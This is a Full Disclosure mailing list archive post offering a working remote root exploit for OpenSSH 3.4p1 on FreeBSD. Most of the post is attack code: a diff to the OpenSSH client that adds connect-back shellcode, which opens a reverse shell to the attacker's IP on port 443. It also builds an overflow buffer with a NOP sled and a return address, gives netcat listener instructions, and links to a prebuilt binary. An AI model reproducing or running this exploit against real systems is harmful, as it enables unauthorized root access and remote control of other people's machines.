Full Disclosure mailing list archives
Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)
From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Fri, 1 Jul 2011 17:45:22 +0200
OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z <yourip> <target> setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King "the archaeologist" Cope diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150
char *myip;
195a197,203
"OpenSSH FreeBSD Remote Root Exploit\n" "By Kingcope\n" "Year 2011\n\n" "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n" "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n" "run like ./ssh -1 -z <yourip> <target>\n" "setup a netcat, port 443 on yourip first\n\n"
299c307 < while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" ---
while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
break; case 'z': myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719
//IP=\xc0\xa8\x20\x80 #define IPADDR "\xc0\xa8\x20\x80" #define PORT "\x27\x10" /* htons(10000) */ char sc[] = "\x90\x90" "\x90\x90" "\x31\xc9" // xor ecx, ecx "\xf7\xe1" // mul ecx "\x51" // push ecx "\x41" // inc ecx "\x51" // push ecx "\x41" // inc ecx "\x51" // push ecx "\x51" // push ecx "\xb0\x61" // mov al, 97 "\xcd\x80" // int 80h "\x89\xc3" // mov ebx, eax "\x68"IPADDR // push dword 0101017fh "\x66\x68"PORT // push word 4135 "\x66\x51" // push cx "\x89\xe6" // mov esi, esp "\xb2\x10" // mov dl, 16 "\x52" // push edx "\x56" // push esi "\x50" // push eax "\x50" // push eax "\xb0\x62" // mov al, 98 "\xcd\x80" // int 80h "\x41" // inc ecx "\xb0\x5a" // mov al, 90 "\x49" // dec ecx "\x51" // push ecx "\x53" // push ebx "\x53" // push ebx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf5" // loop -10 "\x51" // push ecx "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x54" // push esp "\x53" // push ebx "\x53" // push ebx "\xb0\xc4\x34\xff" "\xcd\x80"; // int 80h extern char *myip;
678a731,748
char buffer[100000]; printf("OpenSSH Remote Root Exploit\n"); printf("By Kingcope\n"); printf("Year 2011\n\n"); printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"); printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"); printf("Connect back to: %s:443\n", myip); *((unsigned long*)(sc + 21)) = inet_addr(myip); *((unsigned short*)(sc + 27)) = htons(443); memset(buffer, 'V', 8096); memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 memset(buffer+28, '\x90', 65535); memcpy(buffer+28+65535, sc, sizeof(sc)); server_user=buffer;
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) HI-TECH . (Jul 01)
- Re: Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) Benji (Jul 01)
- Re: Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) HI-TECH . (Jul 01)
- Re: Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD) Benji (Jul 01)